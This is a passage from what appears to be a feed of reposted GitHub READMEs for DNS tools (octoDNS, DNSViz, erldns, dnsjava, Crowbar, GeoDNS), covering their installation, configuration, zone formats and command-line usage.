class: octodns.provider.yaml.YamlProvider
directory: ./config
default_ttl: 3600
enforce_order: True
dyn:
class: octodns.provider.dyn.DynProvider
customer: 1234
username: 'username'
password: env/DYN_PASSWORD
route53:
class: octodns.provider.route53.Route53Provider
access_key_id: env/AWS_ACCESS_KEY_ID
secret_access_key: env/AWS_SECRET_ACCESS_KEY

zones:
example.com.:
sources:
- config
targets:
- dyn
- route53
class is a special key that tells OctoDNS what python class should be loaded. Any other keys will be passed as configuration values to that provider. In general any sensitive or frequently rotated values should come from environmental variables. When OctoDNS sees a value that starts with env/ it will look for that value in the process's environment and pass the result along.
Further information can be found in the docstring of each source and provider class.
Now that we have something to tell OctoDNS about our providers & zones we need to tell it about or records. We'll keep it simple for now and just create a single A record at the top-level of the domain.
config/example.com.yaml
---
'':
ttl: 60
type: A
values:
- 1.2.3.4
- 1.2.3.5
Further information can be found in Records Documentation.

Noop

We're ready to do a dry-run with our new setup to see what changes it would make. Since we're pretending here we'll act like there are no existing records for example.com. in our accounts on either provider.
$ octodns-sync --config-file=./config/production.yaml
...
********************************************************************************
* example.com.
********************************************************************************
* route53 (Route53Provider)
* Create
* Summary: Creates=1, Updates=0, Deletes=0, Existing Records=0
* dyn (DynProvider)
* Create
* Summary: Creates=1, Updates=0, Deletes=0, Existing Records=0
********************************************************************************
...
There will be other logging information presented on the screen, but successful runs of sync will always end with a summary like the above for any providers & zones with changes. If there are no changes a message saying so will be printed instead. Above we're creating a new zone in both providers so they show the same change, but that doesn't always have to be the case. If to start one of them had a different state you would see the changes OctoDNS intends to make to sync them up.

Making changes

WARNING: OctoDNS assumes ownership of any domain you point it to. When you tell it to act it will do whatever is necessary to try and match up states including deleting any unexpected records. Be careful when playing around with OctoDNS. It's best to experiment with a fake zone or one without any data that matters until you're comfortable with the system.
Now it's time to tell OctoDNS to make things happen. We'll invoke it again with the same options and add a --doit on the end to tell it this time we actually want it to try and make the specified changes.
$ octodns-sync --config-file=./config/production.yaml --doit
...
The output here would be the same as before with a few more log lines at the end as it makes the actual changes. After which the config in Route53 and Dyn should match what's in the yaml file.

Workflow

In the above case we manually ran OctoDNS from the command line. That works and it's better than heading into the provider GUIs and making changes by clicking around, but OctoDNS is designed to be run as part of a deploy process. The implementation details are well beyond the scope of this README, but here is an example of the workflow we use at GitHub. It follows the way GitHub itself is branch deployed.
The first step is to create a PR with your changes.
Assuming the code tests and config validation statuses are green the next step is to do a noop deploy and verify that the changes OctoDNS plans to make are the ones you expect.
After that comes a set of reviews. One from a teammate who should have full context on what you're trying to accomplish and visibility in to the changes you're making to do it. The other is from a member of the team here at GitHub that owns DNS, mostly as a sanity check and to make sure that best practices are being followed. As much of that as possible is baked into octodns-validate.
After the reviews it's time to branch deploy the change.
If that goes smoothly, you again see the expected changes, and verify them with dig and/or octodns-report you're good to hit the merge button. If there are problems you can quickly do a .deploy dns/master to go back to the previous state.

Bootstrapping config files

Very few situations will involve starting with a blank slate which is why there's tooling built in to pull existing data out of providers into a matching config file.
$ octodns-dump --config-file=config/production.yaml --output-dir=tmp/ example.com. route53
2017-03-15T13:33:34 INFO Manager __init__: config_file=tmp/production.yaml
2017-03-15T13:33:34 INFO Manager dump: zone=example.com., sources=('route53',)
2017-03-15T13:33:36 INFO Route53Provider[route53] populate: found 64 records
2017-03-15T13:33:36 INFO YamlProvider[dump] plan: desired=example.com.
2017-03-15T13:33:36 INFO YamlProvider[dump] plan: Creates=64, Updates=0, Deletes=0, Existing Records=0
2017-03-15T13:33:36 INFO YamlProvider[dump] apply: making changes
The above command pulled the existing data out of Route53 and placed the results into tmp/example.com.yaml. That file can be inspected and moved into config/ to become the new source. If things are working as designed a subsequent noop sync should show zero changes.

Supported providers

ProviderRequirementsRecord SupportDynamic/Geo SupportNotes
AzureProviderazure-mgmt-dnsA, AAAA, CAA, CNAME, MX, NS, PTR, SRV, TXTNo
CloudflareProviderA, AAAA, ALIAS, CAA, CNAME, MX, NS, SPF, SRV, TXTNoCAA tags restricted
DigitalOceanProviderA, AAAA, CAA, CNAME, MX, NS, TXT, SRVNoCAA tags restricted
DnsMadeEasyProviderA, AAAA, ALIAS (ANAME), CAA, CNAME, MX, NS, PTR, SPF, SRV, TXTNoCAA tags restricted
DnsimpleProviderAllNoCAA tags restricted
DynProviderdynAllBoth
EtcHostsProviderA, AAAA, ALIAS, CNAMENo
GoogleCloudProvidergoogle-cloud-dnsA, AAAA, CAA, CNAME, MX, NAPTR, NS, PTR, SPF, SRV, TXTNo
Ns1ProvidernsoneAllPartial GeoNo health checking for GeoDNS
OVHovhA, AAAA, CNAME, MX, NAPTR, NS, PTR, SPF, SRV, SSHFP, TXT, DKIMNo
PowerDnsProviderAllNo
RackspaceA, AAAA, ALIAS, CNAME, MX, NS, PTR, SPF, TXTNo
Route53boto3A, AAAA, CAA, CNAME, MX, NAPTR, NS, PTR, SPF, SRV, TXTBothCNAME health checks don't support a Host header
AxfrSourceA, AAAA, CNAME, MX, NS, PTR, SPF, SRV, TXTNoread-only
ZoneFileSourceA, AAAA, CNAME, MX, NS, PTR, SPF, SRV, TXTNoread-only
TinyDnsFileSourceA, CNAME, MX, NS, PTRNoread-only
YamlProviderAllYesconfig

Notes

  • ALIAS support varies a lot from provider to provider care should be taken to verify that your needs are met in detail.
    • Dyn's UI doesn't allow editing or view of TTL, but the API accepts and stores the value provided, this value does not appear to be used when served
    • Dnsimple's uses the configured TTL when serving things through the ALIAS, there's also a secondary TXT record created alongside the ALIAS that octoDNS ignores
  • octoDNS itself supports non-ASCII character sets, but in testing Cloudflare is the only provider where that is currently functional end-to-end. Others have failures either in the client libraries or API calls

Custom Sources and Providers

You can check out the source and provider directory to see what's currently supported. Sources act as a source of record information. AxfrSource and TinyDnsFileSource are currently the only OSS sources, though we have several others internally that are specific to our environment. These include something to pull host data from gPanel and a similar provider that sources information about our network gear to create both A & PTR records for their interfaces. Things that might make good OSS sources might include an ElbSource that pulls information about AWS Elastic Load Balancersand dynamically creates CNAMEs for them, or Ec2Source that pulls instance information so that records can be created for hosts similar to how our GPanelProvider works.
Most of the things included in OctoDNS are providers, the obvious difference being that they can serve as both sources and targets of data. We'd really like to see this list grow over time so if you use an unsupported provider then PRs are welcome. The existing providers should serve as reasonable examples. Those that have no GeoDNS support are relatively straightforward. Unfortunately most of the APIs involved to do GeoDNS style traffic management are complex and somewhat inconsistent so adding support for that function would be nice, but is optional and best done in a separate pass.
The class key in the providers config section can be used to point to arbitrary classes in the python path so internal or 3rd party providers can easily be included with no coordination beyond getting them into PYTHONPATH, most likely installed into the virtualenv with OctoDNS.

Other Uses

Syncing between providers

While the primary use-case is to sync a set of yaml config files up to one or more DNS providers, OctoDNS has been built in such a way that you can easily source and target things arbitrarily. As a quick example the config below would sync githubtest.net. from Route53 to Dyn.
---
providers:
route53:
class: octodns.provider.route53.Route53Provider
access_key_id: env/AWS_ACCESS_KEY_ID
secret_access_key: env/AWS_SECRET_ACCESS_KEY
dyn:
class: octodns.provider.dyn.DynProvider
customer: env/DYN_CUSTOMER
username: env/DYN_USERNAME
password: env/DYN_PASSWORD

zones:

githubtest.net.:
sources:
- route53
targets:
- dyn

Dynamic sources

Internally we use custom sources to create records based on dynamic data that changes frequently without direct human intervention. An example of that might look something like the following. For hosts this mechanism is janitorial, run periodically, making sure the correct records exist as long as the host is alive and ensuring they are removed after the host is destroyed. The host provisioning and destruction processes do the actual work to create and destroy the records.
---
providers:
gpanel-site:
class: github.octodns.source.gpanel.GPanelProvider
host: 'gpanel.site.github.foo'
token: env/GPANEL_SITE_TOKEN
powerdns-site:
class: octodns.provider.powerdns.PowerDnsProvider
host: 'internal-dns.site.github.foo'
api_key: env/POWERDNS_SITE_API_KEY

zones:

hosts.site.github.foo.:
sources:
- gpanel-site
targets:
- powerdns-site
from https://github.com/github/octodns

dnsviz

$
0
0

Table of Contents

Description

DNSViz is a tool suite for analysis and visualization of Domain Name System (DNS) behavior, including its security extensions (DNSSEC). This tool suite powers the Web-based analysis available at http://dnsviz.net/

Installation

DNSViz packages are available in repositories for popular operating systems, such as Debian, Ubuntu, and FreeBSD. DNSViz can also be installed on Mac OS X via Homebrew or MacPorts.
The remainer of this section covers other methods of installation, including a list of dependencies, installation to a virtual environment, and installation on Fedora and RHEL6 or RHEL7.
Instructions for running in a Docker container are also available later in this document.

Dependencies

Note that the software versions listed above are known to work with the current version of DNSViz. Other versions might also work well together, but might have some caveats. For example, while the current version of DNSViz works with python 2.6, the importlib (https://pypi.python.org/pypi/importlib) and ordereddict (https://pypi.python.org/pypi/ordereddict) packages are additionally required. Also for python 2.6, pygraphviz version 1.1 or 1.2 is required (pygraphviz version 1.3 dropped support for python 2.6).

Optional Software

  • With OpenSSL version 1.1.0 and later, the OpenSSL GOST Engine is necessary to validate DNSSEC signatures with algorithm 12 (GOST R 34.10-2001) and create digests of type 3 (GOST R 34.11-94).
  • When using DNSViz for pre-deployment testing by specifying zone files and/or alternate delegation information on the command line (i.e., with -N-x, or -D), named(8) is invoked to serve one or more zones. ISC BIND is only needed in this case, and named(8) does not need to be running (i.e., as a server).
    Note that default AppArmor policies for Debian are known to cause issues when invoking named(8) from DNSViz for pre-deployment testing. Two solutions to this problem are to either: 1) create a local policy for AppArmor that allowsnamed(8) to run with fewer restrictions; or 2) disable AppArmor completely.

Installation in a Virtual Environment

To install DNSViz to a virtual environment, first create and activate a virtual environment, and install the dependencies:
$ virtualenv ~/myenv
$ source ~/myenv/bin/activate
(myenv) $ pip install -r requirements.txt
(Note that this installs the dependencies that are python packages, but some of these packages have non-python dependecies, such as Graphviz (required for pygraphviz) and libsodium (required for libnacl), that are not installed automatically.)
Next download and install DNSViz from the Python Package Index (PyPI):
(myenv) $ pip install dnsviz
or locally, from a downloaded copy of DNSViz:
(myenv) $ pip install .

Fedora RPM Build and Install

A Fedora RPM can be built for either python2 or python3. However, note that with Fedora releases after 29, python2 packages are being removed, so python3 is preferred.
The value of ${PY_VERS} is either 2 or 3, corresponding to python2 or python3.
Install the tools for building an RPM, and set up the rpmbuild tree.
$ sudo dnf install rpm-build rpmdevtools python${PY_VERS}-devel
$ rpmdev-setuptree
From within the DNSViz source directory, create a source distribution tarball and copy it and the DNSViz spec file to the appropriate rpmbuild subdirectories.
$ python setup.py sdist
$ cp dist/dnsviz-*.tar.gz ~/rpmbuild/SOURCES/
$ cp contrib/dnsviz-py${PY_VERS}.spec ~/rpmbuild/SPECS/dnsviz.spec
Install dnspython, pygraphviz, M2Crypto, and libnacl.
$ sudo dnf install python${PY_VERS}-dns python${PY_VERS}-pygraphviz python${PY_VERS}-libnacl
For python2:
$ sudo dnf install m2crypto
For python3:
$ sudo dnf install python3-m2crypto
Build and install the DNSViz RPM.
$ rpmbuild -ba rpmbuild/SPECS/dnsviz.spec
$ sudo rpm -iv rpmbuild/RPMS/noarch/dnsviz-*-1.*.noarch.rpm

RHEL6/RHEL7 RPM Build and Install

Install pygraphviz and M2Crypto, after installing their build dependencies.
$ sudo yum install python-setuptools gcc python-devel graphviz-devel openssl-devel
$ sudo easy_install pbr
$ sudo easy_install m2crypto pygraphviz==1.2
(RHEL6 only) Install the EPEL repository, and the necessary python libraries from that repository.
$ sudo yum install epel-release
$ sudo yum install python-importlib python-ordereddict
Install dnspython.
$ sudo yum install python-dns
Install rpm-build tools, then build and install the DNSViz RPM.
$ sudo yum install rpm-build
$ python setup.py bdist_rpm --install-script contrib/rpm-install.sh --distribution-name el${RHEL_VERS}
$ sudo rpm -iv dist/dnsviz-*-1.noarch.rpm
Note that a custom install script is used to properly install the DNSViz man pages. The value of ${RHEL_VERS} corresponds to the RHEL version (e.g., 6 or 7).

Usage

DNSViz is invoked using the dnsviz command-line utility. dnsviz itself uses several subcommands: probegrokgraphprint, and query. See the man pages associated with each subcommand, in the form of "dnsviz- (1)" (e.g., "man dnsviz-probe") for more detailed documentation and usage.

dnsviz probe

dnsviz probe takes one or more domain names as input and performs a series of queries to either recursive (default) or authoritative DNS servers, the results of which are serialized into JSON format.

Examples

Analyze the domain name example.com using your configured DNS resolvers (i.e., in /etc/resolv.conf) and store the queries and responses in the file named "example.com.json":
$ dnsviz probe example.com > example.com.json
Same thing:
$ dnsviz probe -o example.com.json example.com
Analyze the domain name example.com by querying its authoritative servers directly:
$ dnsviz probe -A -o example.com.json example.com
Analyze the domain name example.com by querying explicitly-defined authoritative servers, rather than learning the servers through referrals from the IANA root servers:
$ dnsviz probe -A \
-x example.com:a.iana-servers.org=199.43.132.53,a.iana-servers.org=[2001:500:8c::53] \
-x example.com:b.iana-servers.org=199.43.133.53,b.iana-servers.org=[2001:500:8d::53] \
-o example.com.json example.com
Same, but have dnsviz probe resolve the names:
$ dnsviz probe -A \
-x example.com:a.iana-servers.org,b.iana-servers.org \
-o example.com.json example.com
Analyze the domain name example.com and its entire ancestry by querying authoritative servers and following delegations, starting at the root:
$ dnsviz probe -A -a . -o example.com.json example.com
Analyze multiple names in parallel (four threads) using explicit recursive resolvers (replace 192.0.1.2 and 2001:db8::1 with legitimate resolver addresses):
$ dnsviz probe -s 192.0.2.1,[2001:db8::1] -t 4 -o multiple.json \
example.com sandia.gov verisignlabs.com dnsviz.net

dnsviz grok

dnsviz grok takes serialized query results in JSON format (i.e., output from dnsviz probe) as input and assesses specified domain names based on their corresponding content in the input. The output is also serialized into JSON format.

Examples

Process the query/response output produced by dnsviz probe, and store the serialized results in a file named "example.com-chk.json":
$ dnsviz grok < example.com.json > example.com-chk.json
Same thing:
$ dnsviz grok -r example.com.json -o example.com-chk.json example.com
Show only info-level information: descriptions, statuses, warnings, and errors:
$ dnsviz grok -l info -r example.com.json -o example.com-chk.json
Show descriptions only if there are related warnings or errors:
$ dnsviz grok -l warning -r example.com.json -o example.com-chk.json
Show descriptions only if there are related errors:
$ dnsviz grok -l error -r example.com.json -o example.com-chk.json
Use root key as DNSSEC trust anchor, to additionally indicate authentication status of responses:
$ dig +noall +answer . dnskey | awk '$5 % 2 { print $0 }'> tk.txt
$ dnsviz grok -l info -t tk.txt -r example.com.json -o example.com-chk.json
Pipe dnsviz probe output directly to dnsviz grok:
$ dnsviz probe example.com | \
dnsviz grok -l info -o example.com-chk.json
Same thing, but save the raw output (for re-use) along the way:
$ dnsviz probe example.com | tee example.com.json | \
dnsviz grok -l info -o example.com-chk.json
Assess multiple names at once with error level:
$ dnsviz grok -l error -r multiple.json -o example.com-chk.json

dnsviz graph

dnsviz graph takes serialized query results in JSON format (i.e., output from dnsviz probe) as input and assesses specified domain names based on their corresponding content in the input. The output is an image file, a dot (directed graph) file, or an HTML file, depending on the options passed.

Examples

Process the query/response output produced by dnsviz probe, and produce a graph visually representing the results in a png file named "example.com.png".
$ dnsviz graph -Tpng < example.com.json > example.com.png
Same thing:
$ dnsviz graph -Tpng -o example.com.png example.com < example.com.json
Same thing, but produce interactive HTML format: interactive HTML output in a file named "example.com.html":
$ dnsviz graph -Thtml < example.com.json > example.com.html
Same thing (filename is derived from domain name and output format):
$ dnsviz graph -Thtml -O -r example.com.json
Use alternate DNSSEC trust anchor:
$ dig +noall +answer example.com dnskey | awk '$5 % 2 { print $0 }'> tk.txt
$ dnsviz graph -Thtml -O -r example.com.json -t tk.txt
Pipe dnsviz probe output directly to dnsviz graph:
$ dnsviz probe example.com | \
dnsviz graph -Thtml -O
Same thing, but save the raw output (for re-use) along the way:
$ dnsviz probe example.com | tee example.com.json | \
dnsviz graph -Thtml -O
Process analysis of multiple domain names, creating an image for each name processed:
$ dnsviz graph -Thtml -O -r multiple.json
Process analysis of multiple domain names, creating a single image for all names.
$ dnsviz graph -Thtml -r multiple.json > multiple.html

dnsviz print

dnsviz print takes serialized query results in JSON format (i.e., output from dnsviz probe) as input and assesses specified domain names based on their corresponding content in the input. The output is textual output suitable for file or terminal display.

Examples

Process the query/response output produced by dnsviz probe, and output the results to the terminal:
$ dnsviz print < example.com.json
Use alternate DNSSEC trust anchor:
$ dig +noall +answer example.com dnskey | awk '$5 % 2 { print $0 }'> tk.txt
$ dnsviz print -r example.com.json -t tk.txt
Pipe dnsviz probe output directly to dnsviz print:
$ dnsviz probe example.com | \
dnsviz print
Same thing, but save the raw output (for re-use) along the way:
$ dnsviz probe example.com | tee example.com.json | \
dnsviz print

dnsviz query

dnsviz query is a wrapper that couples the functionality of dnsviz probe and dnsviz print into a tool with minimal dig-like usage, used to make analysis queries and return the textual output to terminal or file output in one go.

Examples

Analyze the domain name example.com using the first of your configured DNS resolvers (i.e., in /etc/resolv.conf):
$ dnsviz query example.com
Same, but specify an alternate trust anchor:
$ dnsviz query +trusted-key=tk.txt example.com
Analyze example.com through the recursive resolver at 192.0.2.1:
$ dnsviz query @192.0.2.1 +trusted-key=tk.txt example.com

Pre-Deployment DNS Testing

The examples in this section demonstrate usage of DNSViz for pre-deployment testing.

Pre-Delegation Testing

The following examples involve issuing diagnostic queries for a zone before it is ever delegated.
Issue queries against a zone file on the local system (example.com.zone). named(8) is invoked to serve the file locally:
$ dnsviz probe -A -x example.com+:example.com.zone example.com
(Note the use of "+", which designates that the parent servers should not be queried for DS records.)
Issue queries to a server that is serving the zone:
$ dnsviz probe -A -x example.com+:192.0.2.1 example.com
(Note that this server doesn't need to be a server in the NS RRset for example.com.)
Issue queries to the servers in the authoritative NS RRset, specified by name and/or address:
$ dnsviz probe -A \
-x example.com+:ns1.example.com=192.0.2.1 \
-x example.com+:ns2.example.com=192.0.2.1,ns2.example.com=[2001:db8::1] \
example.com
Specify the names and addresses corresponding to the future delegation NS records and (as appropriate) A/AAAA glue records in the parent zone (com):
$ dnsviz probe -A \
-N example.com:ns1.example.com=192.0.2.1 \
-N example.com:ns2.example.com=192.0.2.1,ns2.example.com=[2001:db8::1] \
example.com
Also supply future DS records:
$ dnsviz probe -A \
-N example.com:ns1.example.com=192.0.2.1 \
-N example.com:ns2.example.com=192.0.2.1,ns2.example.com=[2001:db8::1] \
-D example.com:dsset-example.com. \
example.com

Pre-Deployment Testing of Authoritative Zone Changes

The following examples involve issuing diagnostic queries for a delegated zone before changes are deployed.
Issue diagnostic queries for a new zone file that has been created but not yet been deployed (i.e., with changes to DNSKEY or other records):
$ dnsviz probe -A -x example.com:example.com.zone example.com
(Note the absence of "+", which designates that the parent servers will be queried for DS records.)
Issue queries to a server that is serving the new version of the zone:
$ dnsviz probe -A -x example.com:192.0.2.1 example.com
(Note that this server doesn't need to be a server in the NS RRset for example.com.)

Pre-Deployment Testing of Delegation Changes

The following examples involve issuing diagnostic queries for a delegated zone before changes are deployed to the delegation, glue, or DS records for that zone.
Specify the names and addresses corresponding to the new delegation NS records and (as appropriate) A/AAAA glue records in the parent zone (com):
$ dnsviz probe -A \
-N example.com:ns1.example.com=192.0.2.1 \
-N example.com:ns2.example.com=192.0.2.1,ns2.example.com=[2001:db8::1] \
example.com
Also supply the replacement DS records:
$ dnsviz probe -A \
-N example.com:ns1.example.com=192.0.2.1 \
-N example.com:ns2.example.com=192.0.2.1,ns2.example.com=[2001:db8::1] \
-D example.com:dsset-example.com. \
example.com

Docker Container

A ready-to-use docker container is available for use.
docker pull dnsviz/dnsviz
This section only covers Docker-related examples, for more information see the Usage section.

Simple Usage

$ docker run dnsviz/dnsviz help
$ docker run dnsviz/dnsviz query example.com

Working with Files

It might be useful to mount a local working directory into the container, especially when combining multiple commands or working with zone files.
$ docker run -v "$PWD:/data:rw" dnsviz/dnsviz probe dnsviz.net > probe.json
$ docker run -v "$PWD:/data:rw" dnsviz/dnsviz graph -r probe.json -T png -O

Using a Host Network

When running authoritative queries, a host network is recommended.
$ docker run --network host dnsviz/dnsviz probe -4 -A example.com > example.json
Otherwise, you're likely to encounter the following error: dnsviz.query.SourceAddressBindError: Unable to bind to local address (EADDRNOTAVAIL)

Interactive Mode

When performing complex analyses, where you need to combine multiple DNSViz commands, use bash redirection, etc., it might be useful to run the container interactively:
$ docker run --network host -v "$PWD:/data:rw" --entrypoint /bin/sh -ti dnsviz/dnsviz
/data # dnsviz --help
from https://github.com/dnsviz/dnsviz

dns解析服务器程序-erldns

$
0
0

Erlang-based DNS Server(起着跟bind一样的作用)

Serve DNS authoritative responses...with Erlang.

Building

To build clean:
./build.sh
If you've already built once and just want to recompile the erl-dns source:
./rebar compile

Zones

Zones are loaded from JSON.
Example JSON files are in the priv/ directory.
You can also write new systems to load zones by writing the zones directly to the zone cache using erldns_zone_cache:put_zone/1.

Configuration

An example configuration file can be found in erldns.config.example.
Copy it to erldns.config and modify as needed.

Running

Launch directly:
erl -config erldns.config -pa ebin -pa deps/**/ebin -s erldns
Or use Foreman:
foreman start

Querying

Here are some queries to try:
dig -p8053 @127.0.0.1 example.com a
dig -p8053 @127.0.0.1 example.com cname
dig -p8053 @127.0.0.1 example.com ns
dig -p8053 @127.0.0.1 example.com mx
dig -p8053 @127.0.0.1 example.com spf
dig -p8053 @127.0.0.1 example.com txt
dig -p8053 @127.0.0.1 example.com sshfp
dig -p8053 @127.0.0.1 example.com soa
dig -p8053 @127.0.0.1 example.com naptr

dig -p8053 @127.0.0.1 -x 127.0.0.1 ptr

Performance

In our environment (DNSimple) we are seeing 30 to 65 µs handoff times to retreive a packet from the UDP port and give it to a worker for processing. Your performance may vary, but given those measurements erl-dns is capable of handling between 15k and 30k questions per second. Please note: You may need to configure the number of workers available to handle traffic at higher volumes.

Design

The erldns_resolver module will attempt to find zone data in the zone cache. If you're embedding erl-dns in your application the easiest thing to do is to load the zone cache once the zone cache gen_server starts push an updated zone into the cache each time data changes.
To insert a zone, use erldns_zone_cache:put_zone({Name, Records}) where Name is a binary term such as <<"example.com">> and Records is a list of dns_rr records (whose definitions can be found in deps/dns/include/dns_records.hrl). The name of each record must be the fully qualified domain name (including the zone part).
Here's an example:
erldns_zone_cache:put_zone({
<<"example.com">>, [
#dns_rr{
name=<<"example.com">>,
type=?DNS_TYPE_A,
ttl=3600,
data=#dns_rrdata_a{ip= {1,2,3,4}}
},
#dns_rr{
name=<<"www.example.com">>,
type=?DNS_TYPE_CNAME,
ttl=3600,
data=#dns_rrdata_cname{dname=<<"example.com">>}
}
]}).

Metrics

Folsom is used to gather runtime metrics and statistics.
There is an HTTP API for querying metric data available at https://github.com/dnsimple/erldns-metrics

Admin

There is a administrative API for querying the current zone cache and for basic control. You can find it in https://github.com/dnsimple/erldns-admin

dns解析服务器程序-dnsjava

$
0
0
The offical home of dnsjava - an implementation of the DNS protocol in Java.

Overview

dnsjava is an implementation of DNS in Java. It supports all defined record types (including the DNSSEC types), and unknown types. It can be used for queries, zone transfers, and dynamic updates. It includes a cache which can be used by clients, and an authoritative only server. It supports TSIG authenticated messages, partial DNSSEC verification, and EDNS0. It is fully thread safe. It can be used to replace the native DNS support in Java.
dnsjava was started as an excuse to learn Java. It was useful for testing new features in BIND without rewriting the C resolver. It was then cleaned up and extended in order to be used as a testing framework for DNS interoperability testing. The high level API and caching resolver were added to make it useful to a wider audience. The authoritative only server was added as proof of concept.

dnsjava on Github

This repository has been a mirror of the dnsjava project at Sourceforge since 2014 to maintain the Maven build for publishing to Maven Central. As of 2019-05-15, Github is officially the new home of dnsjava.
Please use the Github issue tracker and send - well tested - pull requests. The dnsjava-users@lists.sourceforge.netmailing list still exists.

Author

  • Brian Wellington (@bwelling), March 12, 2004
  • Various contributors, see Changelog

Getting started

Run mvn package from the toplevel directory to build dnsjava. JDK 1.4 or higher is required.

Replacing the standard Java DNS functionality:

Java versions from 1.4 to 1.8 can load DNS service providers at runtime. The functionality was removed in JDK 9, a replacement is requested, but so far has not been implemented.
To load the dnsjava service provider, build dnsjava on a JDK that still supports the SPI and set the system property:
sun.net.spi.nameservice.provider.1=dns,dnsjava
This instructs the JVM to use the dnsjava service provide for DNS at the highest priority.

Testing dnsjava

Matt Rutherford contributed a number of unit tests, which are in the tests subdirectory. The hierarchy under tests mirrors the org.xbill.DNS classes. To run the unit tests, execute mvn test. The tests require JUnit.
Some high-level test programs are in org/xbill/DNS/tests.

Limitations

There's no standard way to determine what the local nameserver or DNS search path is at runtime from within the JVM. dnsjava attempts several methods until one succeeds.
  • The properties dns.server and dns.search (comma delimited lists) are checked. The servers can either be IP addresses or hostnames (which are resolved using Java's built in DNS support).
  • The sun.net.dns.ResolverConfiguration class is queried.
  • On Unix, /etc/resolv.conf is parsed.
  • On Windows, ipconfig/winipcfg is called and its output parsed. This may fail for non-English versions on Windows.
  • As a last resort, localhost is used as the nameserver, and the search path is empty.
The underlying platform must use an ASCII encoding of characters. This means that dnsjava will not work on OS/390, for example.

Additional documentation

Javadoc documentation can be built with mvn javadoc:javadoc or viewed online at javadoc.io. See the examples for some basic usage information.

Crowbar Documentation

$
0
0


Reviewed by Hound
This is not the documentation you are looking for... it is a pointer to the real documentation.

Looking for Crowbar Resources?

The Crowbar website has links to all information and is our recommended starting place.

Specific Crowbar Documentation

We track Crowbar documentation with the code so that we can track versions of documentation with the code.
Here are commonly requested references:
You may need to look in subdirectories under the links above for additional details.

from https://github.com/crowbar/crowbar
----

CROWBAR

Transform your bare-metal into an OpenStack Cloud in hours. 
Support for CEPH, High Availability,

from https://crowbar.github.io/

dns解析服务器程序:GeoDNS server

$
0
0


This is the DNS server powering the NTP Pool system and other similar services. Build Status

Questions or suggestions?

For bug reports or feature requests, please create an issue. For questions or discussion, you can post to the GeoDNS category on the NTP Pool forum.

Installation

If you already have go installed, just run go get to install the Go dependencies. GeoDNS requires Go 1.9 or later.
If you don't have Go installed the easiest way to build geodns from source is to download Go from https://golang.org/dl/and untar'ing it in /usr/local/go and then run the following from a regular user account:
export PATH=$PATH:/usr/local/go/bin
export GOPATH=~/go
go get github.com/abh/geodns
cd~/go/src/github.com/abh/geodns
go test
go build
./geodns -h

Sample configuration

There's a sample configuration file in dns/example.com.json. This is currently derived from the test.example.com data used for unit tests and not an example of a "best practices" configuration.
For testing there's also a bigger test file at:
mkdir -p dns
curl -o dns/test.ntppool.org.json http://tmp.askask.com/2012/08/dns/ntppool.org.json.big

Run it

After building the server you can run it with:
./geodns -log -interface 127.1 -port 5053
To test the responses run
dig -t a test.example.com @127.1 -p 5053
or
dig -t ptr 2.1.168.192.IN-ADDR.ARPA. @127.1 -p 5053
or more simply put
dig -x 192.168.1.2 @127.1 -p 5053
The binary can be moved to /usr/local/bin, /opt/geodns/ or wherever you find appropriate.

Command options

Notable command line parameters (and their defaults)
  • -config="./dns/"
Directory of zone files (and configuration named geodns.conf).
  • -checkconfig=false
Check configuration file, parse zone files and exit
  • -interface="*"
Comma separated IPs to listen on for DNS requests.
  • -port="53"
Port number for DNS requests (UDP and TCP)
  • -http=":8053"
Listen address for HTTP interface. Specify as 127.0.0.1:8053 to only listen on localhost.
  • -identifier=""
Identifier for this instance (hostname, pop name or similar).
It can also be a comma separated list of identifiers where the first is the "server id" and subsequent ones are "group names", for example region of the server, name of anycast cluster the server is part of, etc. This is used in (future) reporting/statistics features.
  • -log=false
Enable to get lots of extra logging, only useful for testing and debugging. Absolutely not recommended in production unless you get very few queries (less than 1-200/second).
  • -cpus=1
Maximum number of CPUs to use. Set to 0 to match the number of CPUs available on the system. Only "1" (the default) has been extensively tested.

WebSocket interface

geodns runs a WebSocket server on port 8053 that outputs various performance metrics. The WebSocket URL is /monitor. There's a "companion program" that can use this across a cluster to show aggregate statistics, email for more information.

Runtime status

There's a page with various runtime information (queries per second, queries and most frequently requested labels per zone, etc) at /status.

StatHat integration

GeoDNS can post runtime data to StatHat. (Documentation)

Country and continent lookups

See zone targeting options below.

Weighted records

Most records can have a 'weight' assigned. If any records of a particular type for a particular name have a weight, the system will return max_hosts records (default 2).
If the weight for all records is 0, all matching records will be returned. The weight for a label can be any integer as long as the weights for a label and record type is less than 2 billion.
As an example, if you configure
10.0.0.1, weight 10
10.0.0.2, weight 20
10.0.0.3, weight 30
10.0.0.4, weight 40
with max_hosts 2 then .4 will be returned about 4 times more often than .1.

Configuration file

The geodns.conf file allows you to specify a specific directory for the GeoIP data files and other options. See the geodns.conf.sample file for example configuration.
The global configuration file is not reloaded at runtime.
Most of the configuration is "per zone" and done in the zone .json files. The zone configuration files are automatically reloaded when they change.

Zone format

In the zone configuration file the whole zone is a big hash (associative array). At the top level you can (optionally) set some options with the keys serial, ttl and max_hosts.
The actual zone data (dns records) is in a hash under the key "data". The keys in the hash are hostnames and the value for each hostname is yet another hash where the keys are record types (lowercase) and the values an array of records.
For example to setup an MX record at the zone apex and then have a different A record for users in Europe than anywhere else, use:
{
"serial": 1,
"data": {
"": {
"ns": [ "ns.example.net", "ns2.example.net" ],
"txt": "Example zone",
"spf": [ { "spf": "v=spf1 ~all", "weight": 1 } ],
"mx": { "mx": "mail.example.com", "preference": 10 }
},
"mail": { "a": [ ["192.168.0.1", 100], ["192.168.10.1", 50] ] },
"mail.europe": { "a": [ ["192.168.255.1", 0] ] },
"smtp": { "alias": "mail" }
}
}
The configuration files are automatically reloaded when they're updated. If a file can't be read (invalid JSON, for example) the previous configuration for that zone will be kept.

Zone options

  • serial
GeoDNS doesn't support zone transfers (AXFR), so the serial number is only used for debugging and monitoring. The default is the 'last modified' timestamp of the zone file.
  • ttl
Set the default TTL for the zone (default 120).
  • targeting
  • max_hosts
  • contact
Set the soa 'contact' field (default is "hostmaster.$domain").

Zone targeting options

@
country continent
region and regiongroup

Supported record types

Each label has a hash (object/associative array) of record data, the keys are the type. The supported types and their options are listed below.
Adding support for more record types is relatively straight forward, please open a ticket in the issue tracker with what you are missing.

A

Each record has the format of a short array with the first element being the IP address and the second the weight.
[ [ "192.168.0.1", 10], ["192.168.2.1", 5] ]
See above for how the weights work.

AAAA

Same format as A records (except the record type is "aaaa").

Alias

Internally resolved cname, of sorts. Only works internally in a zone.
"foo"

CNAME

"target.example.com."
"www"
